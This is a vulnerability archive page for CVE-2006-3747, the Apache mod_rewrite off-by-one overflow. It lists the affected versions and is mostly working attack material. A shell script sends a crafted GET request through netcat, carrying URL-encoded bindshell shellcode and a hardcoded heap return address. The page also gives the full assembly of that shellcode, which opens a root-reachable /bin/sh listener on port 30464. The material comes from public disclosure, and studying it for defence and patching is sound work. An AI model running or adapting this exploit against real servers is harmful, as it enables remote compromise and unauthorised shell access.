4837 Total CVEs
26 Years
GitHub
Home / 2006 / CVE-2006-3747
README.md
Rendering markdown...
POC / mod_rewrite.html HTML
⬇ Raw GitHub ✕ Close 
<html>

<head>
<title>
off-by-one overflow in mod_rewrite
</title>
</head>

<body>
<h2>Exploit & info about off-by-one overflow in mod_rewrite module of Apache
HTTP server</h2>
<hr align="center" width="70%">

<ul>
<li>Vulnerable Apache versions:<br>
* 1.3 branch:  &gt;1.3.28 and &lt;1.3.37<br>
* 2.0 branch:  &gt;2.0.46 and &lt;2.0.59<br>
* 2.2 branch:  &gt;2.2.0  and &lt;2.2.3<br><br>
However, due to the nature of the off-by-one sensitive exploitation not all the
vulnerables versions are exploitables ones. I did a successful attack on Apache
1.3.34 (Debian Sarge package).
<br><br>

<li>The Exploit (get the <a href="exploit.sh">source</a>):
<p>
When I posted the original exploit in bugtraq on 2006-Aug-20 I sent the
exploit as a quite long one-line :) My e-mail client wrapped the line and
introduced wrong white spaces between some OPCodes of the shellcode, here
a good and improved version:
</p>

<pre>
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# 
# by jack &lt;jack\x40gulcas\x2Eorg&gt;
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# <a href="draft_on_find_address.html">you must recalculate adressess</a>.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 <a href="draft_on_find_address.html">for any other version/system find it</a>.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow"
echo -e "by jack &lt;jack\x40gulcas\x2eorg&gt;\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80
</pre>

<li>The Shellcode:<br><br>
The assembler code to generate OPCodes showed above is based on Taeho
Oh bindshell and modified to bypass slash char (/) in the path of the shell
(/bin/sh) and simplified, i.e: do not fork(), no short jumps, ...:
<pre>
	<font color="blue">.section</font> .text 
<font color="blue">.globl</font> _start 

_start: 
	<font color="blue">mov</font>  %esp,%esi 
	<font color="blue">xorl</font> %eax,%eax        
	<font color="blue">xorl</font> %ebx,%ebx        
	<font color="blue">movl</font> %esi,%ecx        
	<font color="blue">movb</font> $0x2,%al          
	<font color="blue">movl</font> %eax,(%esi)      
	<font color="blue">movb</font> $0x1,%al          
	<font color="blue">movl</font> %eax,0x4(%esi)   
	<font color="blue">movb</font> $0x6,%al         
	<font color="blue">movl</font> %eax,0x8(%esi)   
	<font color="blue">movb</font> $0x66,%al        
	<font color="blue">movb</font> $0x1,%bl         
	<font color="blue">int</font>  $0x80             
	<font color="blue">movl</font> %eax,(%esi)      
	<font color="blue">movb</font> $0x2,%al          
	<font color="blue">movw</font> %ax,0xc(%esi)    
	<font color="blue">movb</font> $0x77,%al <font color="darkviolet"># 0x77 = port 30464</font>
	<font color="blue">movw</font> %ax,0xe(%esi)    
	<font color="blue">leal</font> 0xc(%esi),%eax   
	<font color="blue">movl</font> %eax,0x4(%esi)   
	<font color="blue">xorl</font> %eax,%eax        
	<font color="blue">movl</font> %eax,0x10(%esi)   
	<font color="blue">movb</font> $0x10,%al        
	<font color="blue">movl</font> %eax,0x8(%esi)   
	<font color="blue">movb</font> $0x66,%al        
	<font color="blue">movb</font> $0x2,%bl         
	<font color="blue">int</font>  $0x80             
	<font color="blue">movb</font> $0x1,%al          
	<font color="blue">movl</font> %eax,0x4(%esi)   
	<font color="blue">movb</font> $0x66,%al        
	<font color="blue">movb</font> $0x4,%bl          
	<font color="blue">int</font>  $0x80             
	<font color="blue">xorl</font> %eax,%eax        
	<font color="blue">movl</font> %eax,0x4(%esi)   
	<font color="blue">movl</font> %eax,0x8(%esi)   
	<font color="blue">movb</font> $0x66,%al        
	<font color="blue">movb</font> $0x5,%bl         
	<font color="blue">int</font>  $0x80             
	<font color="blue">movb</font> %al,%bl          
	<font color="blue">movb</font> $0x3f,%al        
	<font color="blue">xorl</font> %ecx,%ecx        
	<font color="blue">int</font>  $0x80
	<font color="blue">movb</font> $0x3f,%al        
	<font color="blue">movb</font> $0x1,%cl         
	<font color="blue">int</font>  $0x80             
	<font color="blue">movb</font> $0x3f,%al        
	<font color="blue">movb</font> $0x2,%cl         
	<font color="blue">int</font>  $0x80             
	<font color="blue">movl</font> $0x6e696223,%eax <font color="darkviolet"># String #bin</font>
	<font color="blue">movl</font> %eax,(%esi)      
	<font color="blue">movl</font> $0x23687323,%eax <font color="darkviolet"># String #sh#</font> 
	<font color="blue">movl</font> %eax,0x4(%esi)   
	<font color="blue">xorl</font> %eax,%eax        
	<font color="blue">movb</font> %al,0x7(%esi)    
	<font color="blue">movb</font> $0x30,%al <font color="darkviolet"># Move 0x30 to %eax </font>
	<font color="blue">subb</font> $0x01,%al <font color="darkviolet"># Subtract one: 0x2f</font>
	<font color="blue">movb</font> %al,0x4(%esi) 
	<font color="blue">movb</font> %al,(%esi) 
	<font color="blue">movl</font> %esi,0x8(%esi) <font color="darkviolet"># /bin/sh\0 placed in (%esi)</font>
	<font color="blue">xorl</font> %eax,%eax 
	<font color="blue">movl</font> %eax,0xc(%esi)   
	<font color="blue">movb</font> $0x0b,%al         
	<font color="blue">movl</font> %esi,%ebx        
	<font color="blue">leal</font> 0x8(%esi),%ecx   
	<font color="blue">leal</font> 0xc(%esi),%edx   
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># Runs execve(&quot;/bin/sh&quot;, &amp;&quot;/bin/sh&quot;, 0x00000000);</font>
	<font color="blue">xorl</font> %eax,%eax        
	<font color="blue">movb</font> $0x01,%al         
	<font color="blue">xorl</font> %ebx,%ebx        
	<font color="blue">int</font>  $0x80 <font color="darkviolet"> # Runs exit(0);</font> 
</pre>
</ul>

(c) spinfoo

</body>
</html>